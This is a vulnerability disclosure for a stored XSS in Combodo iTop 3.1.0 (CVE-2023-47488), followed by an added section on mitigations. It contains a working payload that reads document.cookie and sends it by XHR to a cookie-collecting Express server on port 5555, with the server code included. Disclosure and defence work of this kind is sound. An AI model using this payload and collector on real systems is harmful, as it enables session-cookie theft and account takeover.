Headline
CVE-2023-47488: bugplorer
Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.
This is the latest version as of November 5, 2023.
First, create a person object.
Use a basic XSS payload.
The script executed for both fields: Last Name and First Name.
Next, host the attacker server on another port, port 5555.
// Require express and create an instance of express app
const express = require('express');
const app = express();

// Define a port number
const port = 5555;

// Define a route for GET requests on '/'
app.get('/', (req, res) => {
  // Extract the 'get' query parameter
  const cookieData = req.query.get;
  // Log the cookie data to the console
  console.log('Received cookie data:', cookieData);
  // Respond with a success message
  res.send('Cookie data received');
});

// Start the server
app.listen(port, () => {
  console.log(`Server listening at http://localhost:${port}`);
});
Use another XSS payload which sends a GET request to localhost port 5555 (the attacker host).
<script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://localhost:5555/?get=' + encodeURIComponent(document.cookie));
  xhr.onload = function() { console.log(xhr.responseText); };
  xhr.send();
</script>
Result
The attacker obtains the cookie when the victim clicks on the malicious person profile.
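The mitigations that break this chain, shown as an added example (generic JavaScript, not iTop code and not part of the original write-up): the stored First Name and Last Name are HTML-encoded at output time, the session cookie is marked HttpOnly so `document.cookie` cannot read it, and a Content-Security-Policy refuses inline scripts and cross-origin XHR. The function names, the `session` cookie name and the sample record are assumptions made for illustration.

```javascript
// Added example: generic mitigations. All names here are hypothetical.

// Characters that let a stored value break out of HTML text or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Single-pass replacement, so an existing '&' is never double-encoded.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a person record; every stored field is encoded when it is written
// into the page, regardless of what was accepted at input time.
function renderPerson(person) {
  return '<div class="person">' +
    `<span class="first-name">${escapeHtml(person.firstName)}</span> ` +
    `<span class="last-name">${escapeHtml(person.lastName)}</span>` +
    '</div>';
}

// Response headers that limit the damage if one output path is missed.
function hardenedHeaders(sessionId) {
  return {
    // HttpOnly keeps the session cookie out of document.cookie.
    'Set-Cookie': `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
    // No inline <script>; XHR/fetch only to the application's own origin,
    // so a request to another port such as :5555 is refused by the browser.
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'; base-uri 'self'",
  };
}

// Constructed sample record with markup stored in both name fields.
const samplePerson = {
  firstName: '<script>alert(1)</script>',
  lastName: `O'Brien "Bob"`,
};

console.log(renderPerson(samplePerson));
console.log(hardenedHeaders('constructed-session-id'));
```

Output encoding is the fix for the injection itself; the cookie flag and the policy are defence in depth and do not replace it.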